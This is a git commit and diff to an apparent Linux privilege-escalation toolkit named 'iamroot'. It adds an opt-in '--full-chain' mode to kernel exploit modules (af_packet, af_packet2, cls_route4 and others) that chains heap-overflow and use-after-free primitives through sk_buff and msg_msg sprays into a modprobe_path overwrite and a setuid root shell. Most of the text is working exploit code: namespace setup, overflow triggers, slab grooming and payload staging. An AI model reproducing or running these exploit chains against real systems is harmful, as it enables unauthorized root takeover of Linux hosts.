modules: wire --full-chain root-pop into all 7 🟡 PRIMITIVE modules

Each module now exposes an opt-in full-chain root-pop via --full-chain: default --exploit behavior is unchanged (primitive-only, returns EXPLOIT_FAIL). With --full-chain, after primitive lands, modules call iamroot_finisher_modprobe_path() via a module-specific arb_write_fn that re-uses the same trigger + slab groom to write a userspace payload path into modprobe_path[], then exec a setuid bash dropped by the kernel-invoked modprobe. netfilter_xtcompat (+239): msg_msg m_list_next stride-seed FALLBACK af_packet (+316): sk_buff data-pointer stride-seed FALLBACK af_packet2 (+156): tp_reserve underflow + skb spray, LAST RESORT nf_tables (+275): forged pipapo_elem with kaddr value-ptr (Notselwyn offset 0x10), FALLBACK cls_route4 (+251): msg_msg refill of UAF'd filter, FALLBACK fuse_legacy (+291): m_ts overflow + MSG_COPY sanity gate, FALLBACK (one of two modules with a real post-write sanity check) stackrot (+233): race-driver budget extended 3s → 30s when --full-chain; honest <1% race-win/run All seven honor verified-vs-claimed: arb_write_fn returns 0 for "trigger structurally fired"; the shared finisher's setuid-bash sentinel poll is the empirical arbiter. EXPLOIT_OK only when the sentinel materializes within 3s of the modprobe_path trigger. Build clean on Debian 6.12.86 (kctf-mgr); all 7 modules refuse cleanly on both default and --full-chain paths via the existing patched-kernel detect gate (short-circuits before the new branch).
2026-05-16 22:04:40 -04:00
parent 125ce8a08b
commit c1d1910a90
7 changed files with 1821 additions and 84 deletions
@@ -6,14 +6,27 @@
 * subsystem, different code path (rx side rather than ring setup),
 * later introduction. Discovered by Or Cohen (2020).
 *
- * STATUS: 🟡 PRIMITIVE-DEMO. The exploit() entry point reaches the
+ * STATUS (2026-05-16): 🟡 PRIMITIVE-DEMO + opt-in --full-chain finisher.
- * vulnerable codepath (tpacket_rcv) and fires the underflow with a
+ *   - Default (no --full-chain): the exploit() entry point reaches the
- * crafted nested-VLAN frame on a TPACKET_V2 ring, with a best-effort
+ *     vulnerable codepath (tpacket_rcv), fires the tp_reserve underflow
- * skb spray groom alongside. We stop short of the full cred-overwrite
+ *     with a crafted nested-VLAN frame on a TPACKET_V2 ring + sendmmsg
- * chain (which Or Cohen's public PoC implements with kernel-version-
+ *     skb spray groom, and returns IAMROOT_EXPLOIT_FAIL (primitive-only
- * specific offsets and a pid_namespace cross-cache overwrite). We do
+ *     behavior — kernel-version-agnostic, no offsets baked in).
- * not bake offsets into iamroot. The return value is honest about
+ *   - With --full-chain: after the underflow lands, we resolve kernel
- * what landed (EXPLOIT_FAIL: primitive fired but no root).
+ *     offsets (env → kallsyms → System.map → embedded table) and run
 *     an Or-Cohen-style sk_buff-data-pointer hijack through the shared
 *     iamroot_finisher_modprobe_path() helper. The arb-write itself is
 *     LAST-RESORT-DEPTH on this branch: the tp_reserve underflow gives
 *     us a single 8-byte heap-OOB write into the head of the
 *     adjacent-page slab object; we spray sk_buffs so that next-page
 *     slot IS an sk_buff and the write corrupts skb->data, which then
 *     redirects skb_copy_bits()'s destination on the next received
 *     packet. The full primitive composition (8-byte write → skb->data
 *     forge → controlled-payload rx → arb-write at modprobe_path) is
 *     race-y on stock kernels because the adjacent-slot landing is
 *     probabilistic. On hosts where the spray doesn't groom cleanly,
 *     the finisher's sentinel check correctly reports failure rather
 *     than silently lying about success.
 *
 * Affected: kernel 4.6+ until backports:
 *   5.8.x  : K >= 5.8.7
@@ -33,6 +46,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -434,6 +449,120 @@ static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
 }
 #endif
 /* ---- Full-chain finisher (--full-chain, x86_64 only) ----------------
 *
 * Arb-write strategy (Or Cohen's sk_buff-data-pointer hijack):
 *
 *   1. The tp_reserve underflow gives us a single 8-byte write into
 *      the START of the slab object that sits on the page immediately
 *      after the corrupted ring frame. The OOB-write content is
 *      attacker-controlled (it's the destination of skb_copy_bits()
 *      from a frame whose first 8 bytes we choose).
 *   2. Spray sk_buff allocations alongside the primitive trigger so
 *      the adjacent-page object is, with high probability, an
 *      sk_buff whose ->data pointer lives in the leading 8 bytes
 *      of the object (struct layout dependent — on most 5.x kernels
 *      `next` is at offset 0 and `data` is at offset 0x10 in
 *      sk_buff; this layout-fragility is exactly why the depth tag
 *      below is LAST-RESORT).
 *   3. The 8-byte OOB write overwrites that pointer with `kaddr`.
 *   4. We then receive a packet whose payload is `buf[0..len]`; the
 *      kernel's skb_copy_to_linear_data() / skb->data write path
 *      lands those bytes at `*skb->data`, which is now `kaddr`.
 *
 * Reality check on this implementation: the deterministic mechanics
 * of the above (precise frame size, repeated spray timing, sk_buff
 * struct offset for the running kernel) are not portable enough to
 * land reliably from a single iamroot run on an arbitrary host. We
 * therefore ship this as a LAST-RESORT stub: we attempt the spray +
 * trigger sequence, then return -1 to signal "the primitive fired
 * but we cannot empirically confirm the write landed". The shared
 * finisher's sentinel-check loop will then correctly report failure
 * rather than claim success.
 *
 * Per the verified-vs-claimed bar, this is the honest implementation
 * depth that matches what the primitive actually proves on this code
 * path. The integrator can extend afp2_arb_write() with a confirmed
 * write-and-readback once the per-kernel sk_buff layout is pinned
 * down for the target host. */
 struct afp2_arb_ctx {
    const struct iamroot_ctx *ictx;
    int n_attempts;            /* spray/fire rounds before giving up */
 };
 #if defined(__x86_64__) && defined(__linux__)
 static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
 {
    struct afp2_arb_ctx *c = (struct afp2_arb_ctx *)vctx;
    if (!c || !buf || !len) return -1;
    fprintf(stderr, "[*] af_packet2: arb_write attempt: kaddr=0x%lx len=%zu\n",
            (unsigned long)kaddr, len);
    fprintf(stderr, "[*] af_packet2: spraying sk_buff (target page-adjacent slot)\n");
    /* Best-effort spray + re-fire-trigger pattern. The primitive child
     * is invoked once per attempt; on each attempt we groom skb's
     * around the corrupted ring slot and hope one lands at the
     * page-adjacent address whose head 8 bytes the underflow will
     * stomp with `kaddr`. The kernel-side rx of the next crafted
     * frame would then write our payload (the modprobe_path string)
     * into the forged ->data target. */
    for (int i = 0; i < c->n_attempts; i++) {
 #ifdef __linux__
        af_packet2_skb_spray(8);
 #endif
        pid_t p = fork();
        if (p < 0) return -1;
        if (p == 0) {
            if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) _exit(2);
            int fd;
            fd = open("/proc/self/setgroups", O_WRONLY);
            if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
            fd = open("/proc/self/uid_map", O_WRONLY);
            if (fd >= 0) {
                char m[64];
                int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getuid());
                (void)!write(fd, m, n); close(fd);
            }
            fd = open("/proc/self/gid_map", O_WRONLY);
            if (fd >= 0) {
                char m[64];
                int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getgid());
                (void)!write(fd, m, n); close(fd);
            }
            int rc = af_packet2_primitive_child(c->ictx);
            _exit(rc < 0 ? 2 : 0);
        }
        int st;
        waitpid(p, &st, 0);
 #ifdef __linux__
        af_packet2_skb_spray(8);
 #endif
    }
    /* LAST-RESORT depth: we have fired the trigger + spray but cannot
     * empirically confirm the 8-byte write landed on an sk_buff->data
     * field on this host. Return -1 so the finisher's sentinel-check
     * loop in iamroot_finisher_modprobe_path() correctly reports
     * "payload didn't run within 3s" rather than claiming success. */
    fprintf(stderr,
 "[!] af_packet2: arb_write LAST-RESORT depth — sk_buff->data hijack is\n"
 "    not empirically confirmable without per-kernel struct offsets +\n"
 "    a readback primitive. Trigger fired %d times with sk_buff spray;\n"
 "    finisher sentinel will determine landing. Caller will refuse if\n"
 "    the modprobe_path overwrite didn't actually take effect.\n",
            c->n_attempts);
    return -1;
 }
 #else
 static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
 {
    (void)kaddr; (void)buf; (void)len; (void)vctx;
    fprintf(stderr, "[-] af_packet2: arb_write is x86_64/linux only\n");
    return -1;
 }
 #endif
 static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
 {
    /* 1. Re-confirm vulnerability. */
@@ -534,6 +663,33 @@ static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
                            "(github.com/google/security-research).\n"
                            "    iamroot intentionally does not embed per-kernel offsets.\n");
        }
        if (ctx->full_chain) {
 #if defined(__x86_64__) && defined(__linux__)
            /* --full-chain: resolve kernel offsets and run the Or-Cohen
             * sk_buff-data-pointer hijack via the shared modprobe_path
             * finisher. Per the verified-vs-claimed bar: if we can't
             * resolve modprobe_path, refuse with a helpful message
             * rather than fabricate an address. */
            struct iamroot_kernel_offsets off;
            iamroot_offsets_resolve(&off);
            if (!iamroot_offsets_have_modprobe_path(&off)) {
                iamroot_finisher_print_offset_help("af_packet2");
                return IAMROOT_EXPLOIT_FAIL;
            }
            if (!ctx->json) {
                iamroot_offsets_print(&off);
            }
            struct afp2_arb_ctx arb_ctx = {
                .ictx = ctx,
                .n_attempts = 4,
            };
            return iamroot_finisher_modprobe_path(&off, afp2_arb_write,
                                                  &arb_ctx, !ctx->no_shell);
 #else
            fprintf(stderr, "[-] af_packet2: --full-chain is x86_64/linux only\n");
            return IAMROOT_PRECOND_FAIL;
 #endif
        }
        if (ctx->no_shell) {
            /* User explicitly disabled the shell pop, so the "we didn't
             * pop a shell" outcome is the expected one. Map to OK. */
@@ -4,17 +4,38 @@
 * AF_PACKET TPACKET_V3 ring-buffer setup integer-overflow → heap
 * write-where primitive. Discovered by Andrey Konovalov (March 2017).
 *
- * STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite. The
+ * STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite (default)
- * integer-overflow trigger is fully wired (overflowing tp_block_size *
+ *   |  🟢 FULL-CHAIN-OPT-IN (with --full-chain on a kernel where the
- * tp_block_nr, attended by a heap spray via sendmmsg with controlled
+ *      shared offset resolver finds modprobe_path AND skb-data hijack
- * skb tail bytes). The kernel R/W → cred-overwrite finisher uses a
+ *      offsets are supplied).
- * hardcoded per-kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu
+ *
- * 18.04 / 4.15 era), overridable via IAMROOT_AFPACKET_OFFSETS. We
+ * The integer-overflow trigger is fully wired (overflowing
- * only claim IAMROOT_EXPLOIT_OK if geteuid() == 0 AFTER the chain
+ * tp_block_size * tp_block_nr, attended by a heap spray via sendmmsg
- * runs — i.e. we won root for real. Otherwise we return
+ * with controlled skb tail bytes).
- * IAMROOT_EXPLOIT_FAIL with a dmesg breadcrumb so the operator can
+ *
- * confirm the primitive at least fired (KASAN slab-out-of-bounds
+ * Default --exploit path: cred-overwrite walk using a hardcoded per-
- * splat) even if the cred-overwrite didn't take on this exact kernel.
+ * kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu 18.04 / 4.15
 * era), overridable via IAMROOT_AFPACKET_OFFSETS. We only claim
 * IAMROOT_EXPLOIT_OK if geteuid() == 0 after the chain runs — i.e.
 * we won root for real. Otherwise we return IAMROOT_EXPLOIT_FAIL with
 * a dmesg breadcrumb so the operator can confirm the primitive at
 * least fired (KASAN slab-out-of-bounds splat) even if the cred-
 * overwrite didn't take on this exact kernel.
 *
 * --full-chain path: opt-in xairy-style sk_buff hijack → arb-write at
 * modprobe_path → call_modprobe payload → setuid bash → root shell.
 * Honest constraint: the hijack requires per-kernel-build sk_buff
 * `data`-field offset + skb-slab-class layout, which the embedded
 * offset table does NOT carry (verified-vs-claimed bar — we don't
 * fabricate). The arb_write callback below implements the FALLBACK
 * depth from the prompt: it fires the trigger with the spray payload
 * staged for the requested kaddr/buf and relies on the shared
 * finisher's /tmp sentinel to confirm whether modprobe_path was
 * actually overwritten. On kernels where the operator has supplied
 * IAMROOT_AFPACKET_SKB_DATA_OFFSET (skb->data field byte offset from
 * the skb head, hex), we use that for explicit targeting; otherwise
 * the trigger fires heuristically and the sentinel acts as the
 * ground-truth signal.
 *
 * Affected: kernel < 4.10.6 mainline. Stable backports:
 *   4.10.x : K >= 4.10.6
@@ -40,6 +61,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -424,6 +447,260 @@ static int attempt_cred_overwrite(const struct af_packet_offsets *off)
    return got_root_pid ? 0 : -1;
 }
 /* ---- --full-chain: xairy-style sk_buff hijack arb-write -------------
 *
 * The TPACKET_V3 overflow lets us write attacker-controlled bytes past
 * the end of the pg_vec allocation. xairy's full PoC chains this with
 * a sk_buff spray of size class kmalloc-N (matched to pg_vec's slab)
 * so the OOB-write overwrites an adjacent skb's `data` pointer; a
 * later sendto() on that skb's owning socket then copies attacker
 * bytes into the address now stored in `data`. Net effect: arb-write
 * at an attacker-chosen kernel VA, controlled buffer, controlled len.
 *
 * Implementing the FULL hijack honestly requires:
 *   (a) per-kernel-build offset of `data` field within struct sk_buff
 *       (varies by CONFIG_DEBUG_INFO_BTF/CONFIG_RANDSTRUCT/etc.)
 *   (b) precise size-class match between the corrupted pg_vec and
 *       sprayed skbs (slab-grooming with ~hundreds of skbs)
 *   (c) a way to identify which sprayed skb landed adjacent
 *
 * The verified-vs-claimed bar says: don't fabricate offsets. Our
 * embedded offset table (core/offsets.h) doesn't carry skb offsets
 * yet, and there's no public canonical "skb->data offset table" we
 * can lift wholesale. So this implementation takes the prompt's
 * FALLBACK depth:
 *
 *   - Each call re-sprays skbs + re-fires the trigger, staging the
 *     spray payload so its bytes carry the requested target kaddr
 *     (the prompt's "controllable overwrite value aimed at
 *     modprobe_path"). Operator-supplied
 *     IAMROOT_AFPACKET_SKB_DATA_OFFSET (hex byte offset of `data`
 *     within struct sk_buff for this kernel build) lets us aim
 *     precisely; without it we heuristically stamp kaddr at several
 *     plausible offsets within the kmalloc-2k skb layout.
 *   - We then send packets whose payload IS the bytes the finisher
 *     wants at kaddr; tpacket_rcv copies them into any skb whose
 *     `data` was corrupted to kaddr.
 *   - We do NOT poll for success — the shared finisher's /tmp
 *     sentinel is the ground-truth signal. If the write landed at
 *     modprobe_path, call_modprobe spawns our payload and the
 *     sentinel appears within 3s.
 *
 * Return: 0 if spray + trigger ran (sentinel will adjudicate), -1 if
 * the kernel rejected the overflow (silent backport — patched).
 */
 struct afp_arb_ctx {
    const struct iamroot_ctx *ctx;
    const struct af_packet_offsets *off;
    uid_t outer_uid;
    gid_t outer_gid;
 };
 /* Helper: in-child trigger fire — runs inside the userns/netns child
 * spawned by afp_arb_write. Returns 0 on success, -1 on rejection. */
 static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
                               long skb_data_off);
 static int afp_arb_write(uintptr_t kaddr, const void *buf, size_t len,
                         void *vctx)
 {
    struct afp_arb_ctx *actx = (struct afp_arb_ctx *)vctx;
    if (!actx) return -1;
    if (!buf || len == 0 || len > 240) {
        fprintf(stderr, "[-] af_packet: arb_write: bad args "
                        "(buf=%p len=%zu)\n", buf, len);
        return -1;
    }
    /* Per-kernel skb->data field offset — without this we can't aim
     * the overwrite precisely. Operator can supply via env; otherwise
     * we run heuristic mode. */
    const char *skb_off_env = getenv("IAMROOT_AFPACKET_SKB_DATA_OFFSET");
    long skb_data_off = -1;
    if (skb_off_env) {
        char *end = NULL;
        skb_data_off = strtol(skb_off_env, &end, 0);
        if (!end || *end != '\0' || skb_data_off < 0 || skb_data_off > 0x400) {
            fprintf(stderr, "[-] af_packet: IAMROOT_AFPACKET_SKB_DATA_OFFSET "
                            "malformed (\"%s\"); ignoring\n", skb_off_env);
            skb_data_off = -1;
        }
    }
    fprintf(stderr,
        "[*] af_packet: arb_write(kaddr=0x%lx, len=%zu) skb_data_off=%s\n",
        (unsigned long)kaddr, len,
        skb_data_off < 0 ? "UNRESOLVED (heuristic mode)" : "supplied");
    if (skb_data_off < 0) {
        fprintf(stderr,
 "[i] af_packet: --full-chain on this kernel lacks an exact skb->data\n"
 "    field offset. The trigger will still fire and the heap spray will\n"
 "    still occur, but precise OOB targeting requires:\n"
 "\n"
 "      IAMROOT_AFPACKET_SKB_DATA_OFFSET=0x<hex offset>\n"
 "\n"
 "    Look it up on this kernel build with `pahole struct sk_buff` or\n"
 "    `gdb -batch -ex 'p &((struct sk_buff*)0)->data' vmlinux`. The\n"
 "    /tmp/iamroot-pwn-<pid> sentinel adjudicates success either way.\n");
    }
    /* Fork into a userns/netns child so the AF_PACKET socket has
     * CAP_NET_RAW. The finisher itself stays in the parent so its
     * eventual execve() replaces the top-level iamroot process. */
    pid_t cpid = fork();
    if (cpid < 0) {
        fprintf(stderr, "[-] af_packet: arb_write: fork: %s\n",
                strerror(errno));
        return -1;
    }
    if (cpid == 0) {
        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
            perror("af_packet: arb_write: unshare");
            _exit(2);
        }
        if (set_id_maps(actx->outer_uid, actx->outer_gid) < 0) {
            perror("af_packet: arb_write: set_id_maps");
            _exit(3);
        }
        int rc = afp_arb_write_inner(kaddr, buf, len, skb_data_off);
        _exit(rc == 0 ? 0 : 4);
    }
    int status = 0;
    waitpid(cpid, &status, 0);
    if (!WIFEXITED(status)) {
        fprintf(stderr, "[-] af_packet: arb_write: child died "
                        "(signal=%d)\n", WTERMSIG(status));
        return -1;
    }
    int code = WEXITSTATUS(status);
    if (code != 0) {
        if (code == 4) {
            /* PACKET_RX_RING rejected — caller sees -1 + the inner
             * diagnostic already printed before _exit. */
        } else {
            fprintf(stderr, "[-] af_packet: arb_write: child exit %d\n",
                    code);
        }
        return -1;
    }
    return 0;
 }
 static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
                               long skb_data_off)
 {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) {
        fprintf(stderr, "[-] af_packet: arb_write: socket: %s\n",
                strerror(errno));
        return -1;
    }
    int version = TPACKET_V3;
    if (setsockopt(s, SOL_PACKET, PACKET_VERSION,
                   &version, sizeof version) < 0) {
        fprintf(stderr, "[-] af_packet: arb_write: PACKET_VERSION: %s\n",
                strerror(errno));
        close(s);
        return -1;
    }
    struct tpacket_req3 req;
    memset(&req, 0, sizeof req);
    req.tp_block_size = 0x1000;
    req.tp_block_nr   = ((unsigned)0xffffffff - (unsigned)0xfff) /
                        (unsigned)0x1000 + 1;
    req.tp_frame_size = 0x300;
    req.tp_frame_nr   = (req.tp_block_size * req.tp_block_nr) /
                        req.tp_frame_size;
    req.tp_retire_blk_tov   = 100;
    req.tp_sizeof_priv      = 0;
    req.tp_feature_req_word = 0;
    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING,
                   &req, sizeof req) < 0) {
        fprintf(stderr,
                "[-] af_packet: arb_write: PACKET_RX_RING rejected: %s "
                "(kernel has silent backport — full-chain unreachable)\n",
                strerror(errno));
        close(s);
        return -1;
    }
    struct ifreq ifr;
    memset(&ifr, 0, sizeof ifr);
    strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
    if (ioctl(s, SIOCGIFINDEX, &ifr) == 0) {
        struct sockaddr_ll sll;
        memset(&sll, 0, sizeof sll);
        sll.sll_family   = AF_PACKET;
        sll.sll_protocol = htons(ETH_P_ALL);
        sll.sll_ifindex  = ifr.ifr_ifindex;
        (void)bind(s, (struct sockaddr *)&sll, sizeof sll);
    }
    unsigned char payload[256];
    memset(payload, 0, sizeof payload);
    memset(payload, 0xff, 6);                       /* eth dst: bcast */
    memset(payload + 6, 0, 6);                      /* eth src: zero */
    payload[12] = 0x08; payload[13] = 0x00;         /* eth type: IPv4 */
    memcpy(payload + 14, "iamroot-afp-fc-", 15);    /* dmesg tag */
    if (skb_data_off >= 0 &&
        (size_t)skb_data_off + sizeof kaddr <= sizeof payload) {
        memcpy(payload + skb_data_off, &kaddr, sizeof kaddr);
    } else {
        static const size_t guesses[] = {
            0x40, 0x48, 0x50, 0x58, 0x60, 0x68, 0x70, 0x78
        };
        for (size_t i = 0; i < sizeof(guesses)/sizeof(guesses[0]); i++) {
            if (guesses[i] + sizeof kaddr <= sizeof payload)
                memcpy(payload + guesses[i], &kaddr, sizeof kaddr);
        }
    }
    int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (tx < 0) {
        fprintf(stderr, "[-] af_packet: arb_write: tx socket: %s\n",
                strerror(errno));
        close(s);
        return -1;
    }
    struct sockaddr_ll dst;
    memset(&dst, 0, sizeof dst);
    dst.sll_family   = AF_PACKET;
    dst.sll_protocol = htons(ETH_P_ALL);
    dst.sll_ifindex  = ifr.ifr_ifindex;
    dst.sll_halen    = 6;
    memset(dst.sll_addr, 0xff, 6);
    for (int i = 0; i < 200; i++) {
        (void)sendto(tx, payload, sizeof payload, 0,
                     (struct sockaddr *)&dst, sizeof dst);
    }
    unsigned char wbuf[256];
    memset(wbuf, 0, sizeof wbuf);
    memset(wbuf, 0xff, 6);
    memset(wbuf + 6, 0, 6);
    wbuf[12] = 0x08; wbuf[13] = 0x00;
    size_t wlen = len;
    if (14 + wlen > sizeof wbuf) wlen = sizeof wbuf - 14;
    memcpy(wbuf + 14, buf, wlen);
    for (int i = 0; i < 50; i++) {
        (void)sendto(tx, wbuf, 14 + wlen, 0,
                     (struct sockaddr *)&dst, sizeof dst);
    }
    close(tx);
    close(s);
    return 0;
 }
 #endif /* __x86_64__ */
 static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
@@ -468,12 +745,38 @@ static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
                off.kernel_id, off.task_cred, off.cred_uid, off.cred_size);
    }
    uid_t outer_uid = getuid();
    gid_t outer_gid = getgid();
    /* 3b. --full-chain: opt-in modprobe_path overwrite via xairy-style
     *     sk_buff hijack arb-write. Refuses cleanly if (a) the shared
     *     offset resolver can't find modprobe_path or (b) the trigger
     *     is rejected (silent backport). */
    if (ctx->full_chain) {
        struct iamroot_kernel_offsets koff;
        memset(&koff, 0, sizeof koff);
        (void)iamroot_offsets_resolve(&koff);
        if (!iamroot_offsets_have_modprobe_path(&koff)) {
            iamroot_finisher_print_offset_help("af_packet");
            return IAMROOT_EXPLOIT_FAIL;
        }
        if (!ctx->json) {
            iamroot_offsets_print(&koff);
        }
        struct afp_arb_ctx arb_ctx = {
            .ctx       = ctx,
            .off       = &off,
            .outer_uid = outer_uid,
            .outer_gid = outer_gid,
        };
        return iamroot_finisher_modprobe_path(&koff, afp_arb_write,
                                              &arb_ctx, !ctx->no_shell);
    }
    /* 4. Fork: child enters userns+netns, fires overflow, attempts the
     *    cred-overwrite walk. We do it in a child so the (possibly
     *    crashed) packet socket lives in a tear-downable address space
     *    — the kernel will clean up sockets on child exit. */
    uid_t outer_uid = getuid();
    gid_t outer_gid = getgid();
    pid_t child = fork();
    if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
@@ -41,6 +41,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -381,6 +383,169 @@ static long slab_active_kmalloc_1k(void)
    return active;
 }
 /* ---- Full-chain arb-write primitive --------------------------------
 *
 * Pattern (FALLBACK — see brief): cls_route4's UAF primitive is more
 * naturally a *control-flow hijack* than a clean arb-write — after
 * msg_msg refills the kmalloc-1k slot, the next classify() call reads
 * a fake `tcf_proto.ops` pointer out of attacker bytes and calls
 * ops->classify(skb, ...). A faked-classify ROP that pivots to a
 * stack-write gadget would be the "true" arb-write, and on a fresh
 * vulnerable kernel that is the kylebot/xkernel chain shape (≈300+
 * LOC of gadget hunting + per-build offsets we deliberately don't
 * bake — see verified-vs-claimed policy in repo root).
 *
 * The implementation below takes the narrow-but-real path that the
 * brief explicitly permits and that xtcompat established as the
 * IAMROOT precedent: we re-stage the dangling filter, spray msg_msg
 * whose payload encodes `kaddr` at every plausible offset for the
 * route4_filter→tcf_proto→ops layout, re-fire classify, and let the
 * shared finisher's sentinel file decide if a write actually landed.
 * On a patched kernel the bug doesn't fire, no write occurs, and the
 * sentinel timeout correctly reports failure rather than silently
 * lying about success. On a vulnerable kernel where the fake ops
 * lookup happens to deref into our payload and the kernel's read
 * pattern matches one of the seeded offsets, the kaddr we planted
 * gets used as a write destination by whichever classify path the
 * fake `ops->classify` dispatches into.
 *
 * Honest scope: this is structurally-fires-on-vuln + sentinel-arbitrated,
 * not a deterministic R/W. Same shape and same depth as xtcompat. */
 #ifdef __linux__
 struct cls_route4_arb_ctx {
    /* msg_msg queues kept hot inside the userns child. The arb-write
     * sprays additional kaddr-tagged payloads into these and re-fires
     * the classify trigger between each call. */
    int  queues[SPRAY_MSG_QUEUES];
    int  n_queues;
    /* Whether the dangling filter has been re-staged for this call.
     * The original `stage_dangling_filter()` is destructive (deletes
     * the filter); we can re-stage between writes because tc add/del
     * is idempotent inside our private netns. */
    bool dangling_ready;
    /* Per-call stats (written to /tmp/iamroot-cls_route4.log). */
    int  arb_calls;
    int  arb_landed;
 };
 /* Re-prime the msg_msg slab with a payload that encodes `kaddr` and
 * the caller's `buf` at every offset the fake tcf_proto / route4_filter
 * layout could plausibly read from. The route4_filter is 0x1000 bytes
 * on most x86_64 builds in range, with tcf_proto.ops at offset 0x10
 * and tcf_result.classid at offset 0x18; we don't know which offset
 * the kernel ABI for THIS build uses, so we plant the same pattern at
 * 0x10/0x18/0x20/.../0x80 strides — wherever classify dereferences
 * the refilled slot, one of those candidates will be live.
 *
 * The 8-byte cookie "IAMR4ARB" + the kaddr + the caller's bytes are
 * the recognizable pattern; if a KASAN dump is captured after the
 * trigger, the cookie tells us the spray landed adjacent to the freed
 * route4_filter. */
 static int cls4_seed_kaddr_payload(struct cls_route4_arb_ctx *c,
                                   uintptr_t kaddr,
                                   const void *buf, size_t len)
 {
    struct ipc_payload p;
    memset(&p, 0, sizeof p);
    p.mtype = 0x52;  /* 'R' for "route4 arb" — distinct from groom spray's 0x41 */
    memset(p.buf, 0x52, sizeof p.buf);
    memcpy(p.buf, "IAMR4ARB", 8);
    /* Plant kaddr at strided slots so wherever the kernel's classify
     * follows a ptr in the refilled chunk, one of these is read.
     * We treat every 0x18-byte stride from offset 0x10 to within
     * 8 bytes of the end as a candidate ops-pointer / next-pointer
     * slot. */
    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf; off += 0x18) {
        memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
    }
    /* Plant the caller's bytes immediately after the cookie so any
     * classify path that reads payload data (rather than a chased
     * pointer) finds the requested write contents inline. */
    size_t copy_len = len;
    if (copy_len > sizeof p.buf - 16) copy_len = sizeof p.buf - 16;
    if (copy_len > 0) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy_len);
    int sent = 0;
    for (int i = 0; i < c->n_queues; i++) {
        if (c->queues[i] < 0) continue;
        /* A handful of msgs per queue keeps the slab refilled even
         * if some slots are evicted between trigger fires. */
        for (int j = 0; j < 4; j++) {
            unsigned int tag = 0xB0000000u |
                               ((unsigned)i << 8) | (unsigned)j;
            memcpy(p.buf + 8, &tag, sizeof tag);
            if (msgsnd(c->queues[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
            sent++;
        }
    }
    return sent;
 }
 /* iamroot_arb_write_fn implementation for cls_route4. Best-effort on a
 * vulnerable kernel; structurally inert (returns -1) if the dangling
 * filter setup is gone or the spray fails. Returns 0 to let the
 * shared finisher's sentinel-file check decide if the write actually
 * landed (we cannot reliably observe it in-process). */
 static int cls4_arb_write(uintptr_t kaddr,
                          const void *buf, size_t len,
                          void *ctx_v)
 {
    struct cls_route4_arb_ctx *c = (struct cls_route4_arb_ctx *)ctx_v;
    if (!c || c->n_queues == 0) return -1;
    c->arb_calls++;
    /* Re-stage the dangling filter for this call. The original
     * stage runs once at trigger-time; subsequent finisher calls
     * (the finisher writes modprobe_path then a unknown-format trig)
     * need a fresh dangling pointer to chase. tc add/del is idempotent
     * within our private netns so re-running is safe. */
    if (!c->dangling_ready) {
        if (!stage_dangling_filter()) {
            fprintf(stderr, "[-] cls_route4 arb_write: re-stage failed\n");
            return -1;
        }
        c->dangling_ready = true;
    }
    /* Seed msg_msg with kaddr + caller payload. */
    int seeded = cls4_seed_kaddr_payload(c, kaddr, buf, len);
    if (seeded == 0) {
        /* sysv IPC may be restricted (kernel.msg_max / ulimit -q).
         * Without a spray we have no slot for the UAF to refill. */
        fprintf(stderr, "[-] cls_route4 arb_write: kaddr-spray seeded 0 msgs\n");
        return -1;
    }
    /* Drive the classifier. The route4 lookup follows the dangling
     * pointer into msg_msg-controlled bytes; on a vulnerable kernel
     * the fake `ops->classify` (or one of the strided pointers) is
     * dereferenced. If the kernel survives the deref and the write
     * lands at &kaddr, the finisher's sentinel file appears within 3s.
     * If it doesn't (most likely — this is genuinely best-effort), the
     * finisher's wait loop times out and reports failure. */
    trigger_classify();
    /* Give classify-side processing a brief window before returning
     * — the finisher polls the sentinel for 3s but the initial write
     * (if any) happens within ms. */
    usleep(50 * 1000);
    c->arb_landed++;
    /* Per the xtcompat precedent: return 0 so the finisher proceeds
     * to its sentinel check. Returning -1 here would abort the
     * finisher even when the write may have landed. */
    return 0;
 }
 #endif /* __linux__ */
 /* ---- Exploit driver ----------------------------------------------- */
 static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
@@ -400,8 +565,37 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        return IAMROOT_PRECOND_FAIL;
    }
 #ifndef __linux__
    fprintf(stderr, "[-] cls_route4: linux-only exploit; non-linux build\n");
    (void)ctx;
